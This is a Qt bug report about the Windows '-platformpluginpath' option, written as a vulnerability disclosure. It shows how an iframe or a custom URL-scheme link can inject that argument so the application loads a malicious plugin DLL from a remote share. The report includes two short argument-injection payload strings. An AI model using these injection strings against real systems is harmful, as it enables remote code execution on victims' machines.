Uploaded image for project: 'Qt'
  1. Qt
  2. QTBUG-75882

commandline - platformpluginpath may cause serious Problem

    XMLWordPrintable

    Details

    • Platform/s:
      Windows

      Description

      The Qt5 application, depending on certain metadata, will automatically execute those plugins pointed by platformpluginpath as soon as they are loaded in memory.

      For example,

      myTest.exe -platformpluginpath C:/Path-of-library/specific

      will load and execute all DLLs in the C:/Path-of-library/specific/imageformats directory. 

       <iframe src='myTest;?" - platformpluginpath \\192.162.x.y\share "'>

      Now this remote “share” contains an “imageformats” directory that holds a “malicious.dll” file. Now since Qt Load plugins based on the metadata so dll name does not matter.

       Another scenario:

      if a user register custom URL scheme for one application in Windows, e.g.

      app://. User has this application installed and URL scheme registered.

       

      Create webpage with link to 'app://? "-platformpluginpath

      \\SERVER\SharedFolder\"'.

       

      When user opens such page on his PC and clicks this link your application is

      started on bis machine and platform plugin is loaded from shared folder. This

      platform plugin can be qwindows.dll with injected code.

      .

      There two nicely detailed article here about this potential dangerous situation:

       

      https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-

      cve-2019-1636-and-cve-2019-6739

       

      https://www.bleepingcomputer.com/news/security/qt5-based-gui-apps-susceptible-

      to-remote-code-execution/

        Attachments

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

          Activity

            People

            Assignee:
            thiago Thiago Macieira
            Reporter:
            irfan.omair@digia.com Irfan Omair
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved:

                Gerrit Reviews

                There are no open Gerrit changes